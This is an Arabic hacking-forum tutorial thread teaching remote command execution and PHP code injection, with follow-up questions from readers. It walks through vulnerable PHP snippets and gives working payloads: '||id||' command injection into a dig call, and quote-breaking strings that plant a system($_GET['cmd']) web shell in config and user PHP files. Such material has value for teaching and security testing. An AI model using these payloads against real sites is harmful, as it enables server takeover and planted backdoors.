Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

السلام عليكم

إزيكو يارجاله
وإيه أخبار الدروس اللى فاتت معاكو؟
إن شاء الله تكون مفهومه كويس
الدرس النهارده ان شاء الله عن ثغرات ال
Remote Command Execute
او بتعرف اختصارا بإسم
RCE
بالاضافه لشرح ثغرات PHP Code Injection

هنتكلم عن اكتشاف الثغره + كذا طريقه لاستغلالها + تخطى بعض المشاكل اللى ممكن تواجهنا اثناء التطبيق
مكنش هينفع الشرح فيديو لان الموضوع عايز فهم اكتر من ما هو محتاج تطبيق
فى الاخر فيه اختبار صغير كده

نبدأ على بركة الله

كبدايه كده
أشهر داله مستخدمه فى تنفيذ الاوامر هى دالة
system
الشكل التقليدى للداله بيكون كده

كود PHP:
$cmd=$_GET['cmd'];
system($cmd); 
يبقى لو فرضنا ان اسم الملف اللى فيه الكود ده هو vuln.php
يبقى الاستغلال هيكون كده
vuln.php?cmd=ls -la
والنتيجه هتكون تنفيذ الأمر بتاعنا
يبقى لو عايزين نبحث عن ملف مصاب بالثغره نستخدم اى برنامج زى النوت باد بلس بلس مثلا
ونبحث عن
system(
او
exec(
passthru(
وهكذا
ونبص على الكود
تابع الموضوع وانت تعرف الطريقه المناسبه للاستغلال
فيه دوال تانيه لتنفيذ الأوامر زى
passthru
shell_exec
exec
نمسكهم واحده واحده كده
system
هتطبق الأمر وتعرضلك النتيجه فى الصفحه
passthru
هتطبق الأمر وتعرضلك نتيجته فى الصفحه
shell_exec
هتطبق الأمر لكن هتعرض النتيجه كمتغير
exec
هتطبق الأمر لكن مش هتعرض النتيجه
فل كده؟؟
من الكلام اللى فوق ده
نعرف ان لو السكربت المصاب موجود فيه دالة
exec
بالشكل ده مثلا
كود PHP:
$cmd=$_GET['cmd'];
echo 
exec($cmd); 
يبقى الاستغلال كده
vuln.php?cmd=ls -la
مش هتشوف نتيجة الأمر
لكن فى الحقيقه الأمر اتنفذ بالفعل
تمام لحد دلوقت؟

ركز فى اللى جى بقى لان كل اللى فوق ده ولا حاجه
هاتلك فنجان قهوه كده واقفل الأغانى وفتح عي*** معايا كويس أوى

ناخد المثال الاول
سكربت من سكربتات
whois lookup
نبص على الكود كده
كود PHP:
<?php
include("common.php");
showMenu();
echo 
'<br>';
$status $_GET['status'];
$ns  $_GET['ns'];
$host$_GET['host'];
$query_type$_GET['query_type'];
$ip  $_SERVER['REMOTE_ADDR'];
$self$_SERVER['PHP_SELF'];
$host trim($host);
$host strtolower($host);
echo(
"<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo 
'<pre>';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo 
'</pre>';
?>
واخدين بالكو من دى؟؟
كود PHP:
system ("dig @$ns $host $query_type"); 
فل
يبقى لو فرضنا ان اسم الملف vuln.php
يبقى الاستغلال هيبقى ايه؟؟
حاول تطلعه مع نفسك كده
زى ما عملنا فووووق فى اول الموضوع

المفروض الاستغلال يبقى كده
vuln.php?ns=id&host=sec4ever.com&query_type=ANY&st atus=digging
يبقى من بين كل دول انا عدلة خانة
ns
وحطيت فيها الامر بتاعى اللى هو
id
طبق كده وشوف
النتيجه
مفيش أوامر اتنفذت
ليه؟؟
الاستغلال اللى اجنا كتبناه اما ييجى يتنفذ هيتنفذ بالشكل ده
system ("dig id sec4ever.com ANY");
طبعا أمر ملوش معنى
طب والحل؟؟؟
الحل يا معلم اننا نفصل الأمر اللى عايزين نطبقه عن باقى الاوامر
طب ازاى؟؟
كده يا حج
;
او
||
انت اما بتحب تنفذ كذا امر جنب بعض فى اللينكس بتنفذهم كده
ls -la;id;uname-a
تمام؟؟
بس هنا مش هينفع نستخدم ;
يبقى خلينا فى ||
كده بينفذ الاوامر واحد بعد التانى
نفس الفكره هنا
احنا عايزين ننفذ الأمر بتاعنا لوحده ونفصله عن اللى قبله واللى بعده
يبقى هننفذه بالطريقه دى
vuln.php?ns=||id||&host=sec4ever.com&query_type=AN Y&status=digging
الأمر هيتنفذ بالشكل ده
system ("dig ||id|| sec4ever.com ANY");
بكده هنلاقيه نفذ أمر
dig
وبعدين
id
وهنلاقيه عرضلنا النتيجه زى الفل

نبدأ فى حقن أكواد البى اتش بى وتشغيل الدماغ بقى
اقرا المثال كذا مره عشان تستوعب كويس وبعدها خش على المثال التانى


PHP Code Injection

هنقوم احنا بنفسنا بحقن كود ال
RCE
فيه
او ممكن نحقن اى كود بى اتش بى طبعا بس خلينا فى الريموت كوماند
المثال
كود PHP:
if(isset($action) && $action == "setconfig") {
$config_file = "config.php";
$handle = fopen($config_file, 'w');
$StringData = "<?php\r
$"."news_width = '".clean($_POST[news_width])."';\r
$"."bgcolor = '".clean($_POST[bgcolor])."';\r
$"."fgcolor = '".clean($_POST[fgcolor])."';\r
$"."padding = '".clean($_POST[padding])."';\r
$"."subject_margin = '".clean($_POST[subject_margin])."';\r
$"."fontname = '".clean($_POST[fontname])."';\r
$"."fontsize = '".clean($_POST[fontsize])."';\r\n?>";
fwrite($handle, $StringData);
}
برىء فى الظاهر
مفيش لا سيستم ولا بطيخ
طيب نشوف بيعمل ايه البتاع ده
$
كود PHP:
config_file "config.php";
$handle fopen($config_file'w 
');
مرتبط بملف تانى اللى هو
config.php
وبيعدل عليه
تمام
نشوف ملف config.php
كود PHP:
<?php
$news_width 
'600px';
$bgcolor '#000000';
$fgcolor '#ffffff';
$padding '5px';
$subject_margin '0px';
$fontname 'verdana';
$fontsize '13px';
?>
واضح كده ان ملف الكونفيج بيستقبل متغيرات عن طريق الملف الأولانى
يبقى ممكن نعدل فى المعلومات اللى بتتحط فى الكونفيج دى
ونحط مكانها كود ريموت كوماند
نحقن مثلا الكود ده
كود PHP:
<?php system($_GET['cmd']); ?>
فى خانة
$news_width
طيب تعالى نروح نحقن الكود كده
user.php?action=setconfig
حطينا الكود
نجرب نطبق الامر بالشكل ده
config.php?cmd=id
هيدينا إيرور
السبب
لو بصينا على ملف الكونفيج هنلاقيه كده
كود PHP:
$news_width = '<?php system($_GET['cmd']); ?>';
والكود طبعا غلط بالمره
يبقى لازم فى الحاله دى نشغل البصله برضه يا جدعان
نشوف الكود الاصلى كده
$news_width = '600px';
طيب
ايه رأيك نجرب الكود ده
';system($_GET['cmd']);'
شوف هيبقى فى ملف الكونفيج ازاى
كود PHP:
$news_width '';system($_GET['cmd']);''
نقسمه كده
$news_width = ''; ده كود لوحده

system($_GET['cmd']); وده كود لوحده وهو اللى يهمنا

''; وده كود لوحده

كل اللى عملناه اننا قفلنا اقواس التنصيص وحطينا نهايه للكود باستخدام ;
وبعدها بدأنا كود جديد اللى هو فيه دالة السيستم
وقفلناه برضه وبعدين كود اخير عباره عن قوسين تنصيص وخلاص
نروح نجرب
config.php?cmd=id
اتنفذ زى الفل

نبص ع مثال تالت
هنا الأخبار بتتكتب فى ملف اسمه
news.txt
نبص على الملف كده
كود بلغة HTML:
<table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div>
طيب ما احنا نقدر نحقن كود بى اتش بى تبعنا
بس الملف تكست يبقى مش هيتنفذ؟
غلط
احنا هنحقنه فى ملف تكست لكن هنستعرضه من ملف بى اتش بى )
ازاى؟
نبص على الملف اللى بيكتب الأخبار كده
كود PHP:
$newsfile "news.txt";
$file fopen($newsfile"r");
elseif ((isset(
$_REQUEST["title"])) && (isset($_REQUEST["date"])) &&
(isset(
$_REQUEST["post"])) && ($_REQUEST["title"]!="") &&
(
$_REQUEST["date"]!="") && ($_REQUEST["post"]!="")) {
$current_data = @fread($filefilesize($newsfile));
fclose($file);
$file fopen($newsfile"w");
$_REQUEST["post"] = stripslashes(($_REQUEST["post"]));
$_REQUEST["date"] = stripslashes(($_REQUEST["date"]));
$_REQUEST["title"] = stripslashes(($_REQUEST["title"]));
if(
fwrite($file,$btable " " $btitle " " $_REQUEST["title"] . " " .  $etitle " " $bdate " " $_REQUEST["date"] . " " $edate " " $bpost " " $_REQUEST["post"] . " " $epost " " $etable "\n " $current_data))
include 
'inc/posted.html';
else
include 
'inc/error1.html';
fclose($file);

واضح من الكود ان الاخبار بتتكتب فى ملف news.txt
طيب
الزوار أكيد مش هيدخلو على ملف
news.txt
لان كله اكواد هتمل الزائر العادى مش هيفهم منها حاجه
اكيد فيه مكان بيشوفو فيه الاخبار
نبص فى السكربت نلاقى ملف اسمه مثلا
display.php
نبص عليه
كود PHP:
<?
include("news.txt");
?>
فل
طيب نحقن كودنا عن طريق ملف post.php
عن طريق التيتل مثلا
كود PHP:
<?php system($_GET['cmd']); ?>
طيب هنلاقى نتيجتنا فى ملف
news.txt
زى كده
كود بلغة HTML:
<table class='sn'> <tbody> <tr><td class='sn-title'>  <?php system($_GET['cmd']); ?> </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test2 </td></tr> </tbody></table><div><br /></div>
<table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div>
ممنهاش فايده طبعا
لكن فى ملف display.php
هنلاقيها بالشكل ده

كود PHP:
<?
<table class='sn'> <tbody> <tr><td class='sn-title'>  <?php system($_GET['cmd']); ?> </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test2 </td></tr> </tbody></table><div><br /></div>
<table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div>
?>
فل
استعرضه على انه بى اتش بى
ننفذ أمرنا بالطريقه دى
display.php?cmd=id
والنتيجه تم تنفيذ الأمر بدون مشاكل
يبقى هنا اللى عملناه
حقننا كود عن طريق ملف
post.php
الى ملف
news.txt
واستعرضنا النتيجه من ملف
display.php


ناخد مثال كمان
اصعب شويه من اللى فوق
فى المثال ده اما بنعمل عضويه جديده بتتسجل البيانات فى ملف بى اتش بى
نبص على بعض اكواد الملف المسئول عن التسجيه
add_reg.php
نلاقى

كود PHP:
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
$html = "<?php
\$regdate = \"$date\";
\$user = \"
$user\";
\$pass = \"
$pass1\";
\$email = \"
$email1\";
\$location = \"
$location\";
\$url = \"
$url\";
?>"
;
$fp fopen($filename'a+');
fputs($fp$html) or die("Could not open file!");
ركز فى الكود كده
هتلاقيه بيعمل ملف باسم اليوزر اللى انت بتكتبه فى مجلد
sites
يعنى مثلا لو سجلت بإسم
faris
هيعمل ملف كده
site.com/sites/faris.php
طيب
واحنا بنسجل ليه منحقنش الكود تبعنا؟
ناخد مثلا خانة
$location = $_POST['location'];
بيطلب منك تكتب الاقامه
طيب نحطله الخزوق بتاعنا
كود PHP:
<?php system($_GET['cmd']); ?>
النتيجه فى ملف
faris.php
هتبقى كده
كود PHP:
<?php
$regdate 
"13 feb 2011, 4:16 PM";
$user "faris";
$pass "xxxxx";
$email "[email protected]";
$location "<?php system($_GET['cmd']); ?>";
$url "http://sec4ever.com";
?>
حاول تستعرض الملف
sec4ever.com/site/faris.php
النتيجه
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING
رد علينا بخازوق مماثل )
طيب
حاول تطلع الحل انت كده
ازاى نخليه ينفذ الاوامر من غير خطأ؟؟

نعمل تعديل صغنون فى الكود اللى بنحقنه
نخليه كده
كود PHP:
\";?><?php system(\$_GET['cmd']);?><?php \$xxx=\":D
ههههههههههههههه
بسيطه صح؟؟
هيبقى شكله كده فى الملف تبعنا
كود PHP:
<?php
$regdate 
"13 fabr 2011, 4:18 PM";
$user "farisa";
$pass "xxxxx";
$email "[email protected]";
$location "";?><?php system($_GET['cmd']);?><?php $xxx=":D";
$url "http://sec4ever.com";
?>
نفصل الكود تبعنا
"";?>
أنهينا بيها اكواد البى اتش بى زى كده
كود PHP:
<?php
$regdate 
"13 fabr 2011, 4:18 PM";
$user "farisa";
$pass "xxxxx";
$email "[email protected]";
$location "";
?>
قولناله ان دى نهاية كود البى اتش بى


كود PHP:
<?php system($_GET['cmd']);?>
بعدها كود بى اتش بى جديد اللى فيه الخزوق تبعنا
كود PHP:
<?php $xxx=":D";
يدأنا ملف بى اتش بى جديد
زى كده
كود PHP:
<?php $xxx=":D";
$url = "http://sec4ever.com";
كود PHP:
?> 
وبعدها يبدأ كود جديد تالت
نروح نستعرض الملف
sec4ever.com/site/farisa.php?cmd=id
والنتيجه اتنفذ الكود بدون أخطاء

وبكده انتهى الدرس ده

مرفق لكم بقى يا حلوين ملف من سكربت عادى
مصاب بثغره من الثغرتين دول
RCE
او
php code injection
فل كده
مطلوب منكو تطلعو الكود المصاب + لينك الاستغلال ان امكن
ويتبعتو لى او لفوكس على الخاص
اما نشوف مين اللى متابع ومركز ومين لا
واللى مش هيبعت هسيحله هنا وربنا
فى انتظاركو

ملحوظه : نسبه من الدرس مترجمه مع زياده فى الشرح من أجل توصيل المعلومه

هذا وإن أصبت فمن الله وإن أخطأت فمنى ومن الشيطان

أى استفسار موجود ان شاء الله



بالتوفيق يا شباب



24 أعضاء قالوا شكراً لـ i-Hmx على المشاركة المفيدة:
زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

هلا حبيبي فراس ..

درس جميل وتابعته كامل بس فيه استفسار ..

الكود هذا انت تقول استغلاله هيك خطأ تمام ..

كود PHP:
$location = "<?php system($_GET['cmd']); ?>";
وقلت ان الاستغلال الصحيح هيك ..

كود PHP:
$location = "\";?><?php system($_GET['cmd']);?><?php $xxx=":D
نغلق كود php ونرجع نتفحه الخ ...
طيب فيه نفس المثال ذكرته في الاعلى فبداية الدرس وكتبت الاستغلال كذا

كود PHP:
$location "";System($_GET['cmd']);""
هل عادي يكتب لها اكثر من استغلال .؟

ياريت تكون فاهمني عشان ما نتعقد اكثر من اللازم

طبعا يمكن انت خرفت من الدرس ونسيت تنزل موضوع استفسارات معاك حق والله

2 أعضاء قالوا شكراً لـ زحوفي على المشاركة المفيدة:
زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

عشان ما اتعبك زياده هذي الكودين الي فيهم الاستفسارات ..

كود PHP:
$news_width = '<?php system($_GET['cmd']); ?>';

$news_width = '';system($_GET['cmd']);'';
هذا الكود الاول واستغلاله تحت

وهذا الثاني
كود PHP:
$location = "<?php system($_GET['cmd']); ?>";

$location = "\";?><?php system($_GET['cmd']);?><?php $xxx=":D
هل يمكن التبديل بينهم ؟ الاول يستخدم ' مفرده والكود الثاني يستخدم المضاعفه "

تحياتي واي استفسار ان شاء الله ما بوضح لك كل شي فيه

i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

ههههههههههههه
معلش نسيت موضوع الاستفسارات
بالنسبه للاستغلالات بتختلف باختلاف المتغير المصاب
يعنى هنا

$location = "<?php system($_GET['cmd']); ?>";
ملهاش معنى
انت حطيت كود بى اتش بى بين قوسين تنصيص
فمش هيتنفذ طبعا
فكان لازم نقفل كود البى اتش بى الاولانى بعد علامة التنصيق
ونخلى الكود تبعنا كانه ملف تانى خالص
اما هنا
طيب فيه نفس المثال ذكرته في الاعلى فبداية الدرس وكتبت الاستغلال كذا
$location = "";System($_GET['cmd']);"";
انت تقصد
$news_width = '';system($_GET['cmd']);'';
هنا بقى يا حج الكود اللى بنحطه مش بيبقى بين اقواس تنصيص
فمش محتاجين نقفل الكود ونفتحه تانى
كل اللى بنحتاجه بنقفل المتغير الل هو news_width بقوسين تنصيص من عندنا بس
ممكن تستخدم الطريقه اللى فوق دى فى الحالتين
بس حبيت انوع مش اكتر
اتمنى تكون فهمتنى
وانت بالذات يا زحوفى على الطلاق لو مجبت الاستغلال هشعلقك
بهزر معاك
بس هشعلقك فعلا )
بالتوفيق

زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

يارجال تامرني امر ابشر ان شاء الله اجيبه بس انزل استفساري الاخير عشان يكون الموضوع مفهوم

وما تطير المعلومات

في هذا الكود

كود PHP:
if(isset($action) && $action == "setconfig") {
$config_file = "config.php";
$handle = fopen($config_file, 'w');
$StringData = "<?phpr
$"."news_width = '".clean($_POST[news_width])."';r
انت قلت ان نحقن

كود PHP:
<?php system($_GET['cmd']); ?>
في $"."news_width تمام ..

طيب لو كان الملف مو مسموح بالتعديل عليه او ما ينعرض فيه حاجه بس مصمم لاجل ان ينعمل له انكلود

مثل مثال الوقت الي منزله انت ..

التعديل راح يكون في اي صفحه صفحة الملف نفسه او ملف الكونفيق ؟

يعني نفرض ان المثال الاول f(isset($action)...

اسمع Faris.php

الاستغلال راح يكون كذا من الـ url

كود PHP:
faris.php?news_width='';system($_GET['cmd']);''
او اعدلها من ملف الـ Config ؟

تحياتي لك حبيبي ويارب ما اكون عقدت عليك الاسئلة

جاري حل المثال

زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

++

ازعجتك اليوم بالاسئلة ..

PhP Code شرط لها ان تكون هناك دالة من الدوال المذكوره فوق .؟

او اقدر اقفل ملف هيك

كود PHP:
$news_width '';system($_GET['cmd']);''
وخلاص .؟ يعني لازم يكون بداية الكود او يتضمن دالة من هذي .؟

وتحياتي تم حل المثال عالخاص ::..

FoX HaCkEr PyThon Lov3r
  • شكراً: 341
  • تم شكره 569 مرة في 107 مشاركة

قمة الابداع يابرنس

توقيع
\/1\/4 $3(Ur17'/ Ph0r 3\/3r
محمدلينوكس عضو مميز
  • شكراً: 253
  • تم شكره 35 مرة في 19 مشاركة

مبدع والله دروس قوية بارك الله فيك

محمدلينوكس عضو مميز
  • شكراً: 253
  • تم شكره 35 مرة في 19 مشاركة

اخي ياريت تشرحلي هذا السطرين

system ("dig @$ns $host $query_type");


vuln.php?ns=id&host=sec4ever.com&query_type=ANY&st atus=diggin

اخي ما دام احنا استعملنا المتغير $ns وكتبنا الامر =id

لكن شو هذا

&host=sec4ever.com&query_type=ANY&st atus=diggin

ليش استعملت host + qurey_type

??????? اعذررني على السوال الغبي لاكن مبتدء وشكرا

وملاحظة للي يستخدمون ويندوز اكس بي تراه

مايصير تكتب اوامر الينكس مثل is -al

لازم اوامر ويندوز

i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

آسف على التأخر فى الردود ياشباب لكن فيه مشكله فى الاتصال
بقالى ساعه بحمل فى الصفحه
المهم
نشوف الاستفسارات


طيب لو كان الملف مو مسموح بالتعديل عليه او ما ينعرض فيه حاجه بس مصمم لاجل ان ينعمل له انكلود

مثل مثال الوقت الي منزله انت ..

التعديل راح يكون في اي صفحه صفحة الملف نفسه او ملف الكونفيق ؟

يعني نفرض ان المثال الاول f(isset($action)...

اسمع Faris.php

الاستغلال راح يكون كذا من الـ url

كود PHP:
faris.php?news_width='';system($_GET['cmd']);'';

او اعدلها من ملف الـ Config ؟
اول حاجه لو مش مسموح بالتعديل فى الملف نفسه ممكن تجرب تعدل فى الملف اللى معموله انكلود
تانى حاجه
مينفعش انك تعمل كده
faris.php?news_width='';system($_GET['cmd']);'';

لإنها جوه ملف البى اتش بى هتكون بالشكل ده
\'\';system($_GET[\'cmd\']);\'\';
فمش هينفع تتنفذ كده بالمره
فلازم تحقن فى ملف بى اتش بى تانى
اتمنى تكون وصلت الفكره

PhP Code شرط لها ان تكون هناك دالة من الدوال المذكوره فوق .؟

او اقدر اقفل ملف هيك
مفيش شروط يا حج
المهم تحقن الكود بدون أخطاء بأى وسيلة كانت
ده الهدف بس


اخي ما دام احنا استعملنا المتغير $ns وكتبنا الامر =id

لكن شو هذا

&host=sec4ever.com&query_type=ANY&status=diggin

ليش استعملت host + qurey_type
مين اللى قال سؤال غبى يا حج
بالعكس سؤال المفروض يتسإل من اول رد
احنا عملنا كده عشان مينفعش ينفذ اوامر فاضيه لانه كان هيدينا خطأ
توضيح
يعنى الكود الاصلى كده
كود PHP:
system ("dig @$ns $host $query_type"); 
المفروض انه بينفذ الامر على بعضه
فاحنا حطينا ||id|| بحيث انه ينفذ الامر
||id||لوحده
وينفذ
dig sec4ever.com any
لوحده
يعنى احنا كل الىل عملناه خلينا بدل الأمر الواحد أمرين
الامر الاولانى الىل هو موجود اصلا وهو dig بمتغيراته
والامر التانى اللى احنا حطيناه id
يعنى انت ضفت امر لكن ملغتش الامر اللى كان موجود من الاساس
أتمنى تكون فهمتنى يا معلم

وآسف مره تانيه على التأخر فى الردود
حتى الرسايل الخاصه مش راضيه تفتح )

بالتوفيق